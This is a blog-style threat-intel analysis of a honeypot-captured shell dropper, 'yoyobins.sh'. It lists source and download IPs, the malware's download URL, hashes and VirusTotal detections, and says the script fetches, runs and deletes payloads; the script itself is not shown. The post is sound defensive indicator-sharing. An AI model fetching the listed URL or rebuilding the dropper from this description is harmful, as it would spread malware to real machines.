Script Analysis- yoyobins.sh
In addition to my weekly threat intel report, I want to highlight a particular file/executable/exploit attempt I saw in the last week. I’ll do some basic analysis of the file to better understand what it is, and what it’s trying to accomplish. Hopefully this can provide contextual data for those doing their own research.
This week we’re looking at yoyobins.sh, a malicious file acting as a malware dropper. My logs show an American IP address logged into my honeypot, then reached out to a Croatian IP for the file dropper: yoyobins.sh. When this script is run, it requests a number of additional payloads and attempts to save them to various directories (/tmp, /var/run, /root). Once saved, it changes the scripts permissions to be executable, runs the program, then kills the file after it completes.
Filename: yoyobins.sh
Timestamp: 2020-06-08 12:59PM PST
Initiating Source IP: 104.248.48.57
Downloaded from: http://45.95.168.196/yoyobins.sh
SHA256: bde80d3922630e57731bb0dd6c8705aa8ca3fb863b9fcac295076ac9ad1510e1
Virus Total Link: https://www.virustotal.com/gui/file/bde80d3922630e57731bb0dd6c8705aa8ca3fb863b9fcac295076ac9ad1510e1/detection
File Contents:

Initiating Source IP Analysis:
Analysis Date | 2020-06-08 21:39:51 |
Elapsed Time | 2 seconds |
Blacklist Status | BLACKLISTED 11/114 |
IP Address | 104.248.48.57 Find Sites | IP Whois |
Reverse DNS | prod-nyc1.qencode-encoder-d9bdf0b8a9ec11ea888b0e903d539a24 |
ASN | AS14061 |
ASN Owner | DIGITALOCEAN-ASN |
ISP | Digital Ocean |
Continent | North America |
Country Code | |
Latitude / Longitude | 40.793 / -74.0247 Google Map |
City | North Bergen |
Region | New Jersey |
Download URL analysis:
Analysis Date | 2020-06-08 21:40:37 |
Elapsed Time | 3 seconds |
Blacklist Status | BLACKLISTED 6/114 |
IP Address | 45.95.168.196 Find Sites | IP Whois |
Reverse DNS | slot0.ormardex.com |
ASN | AS42864 |
ASN Owner | Giganet Internet Szolgaltato Kft |
ISP | MAXKO j.d.o.o. |
Continent | Europe |
Country Code | |
Latitude / Longitude | 45.4675 / 16.3868 Google Map |
City | Sisak |
Region | Sisacko-Moslavacka Zupanija |
Virus Total Stats:
As of 2020-06-08, 32/60 engines detect this file as malicious
Additional properties:
MD5: a39ab86543f724295ce2678e78d754f5
SHA-1: 7078ca1701557231495c035cba938588e5fb1b2b
SHA-256: bde80d3922630e57731bb0dd6c8705aa8ca3fb863b9fcac295076ac9ad1510e1
SSDEEP: 12:q0FoV0FS0Fd0c43fX0Fa8eekX0Flk0FVUX0Fg1FZ0FlEX0FC0FdeV8po0F7O0FQ:vo+nyc4krasvVUsg+lEsX9JnQ
File type: Shell script
Magic: Bourne-Again shell script text executable
File size: 1.48 KB (1516 bytes)
Contacted URLS:
Windows Defender:

Virus Total Graph Summary:
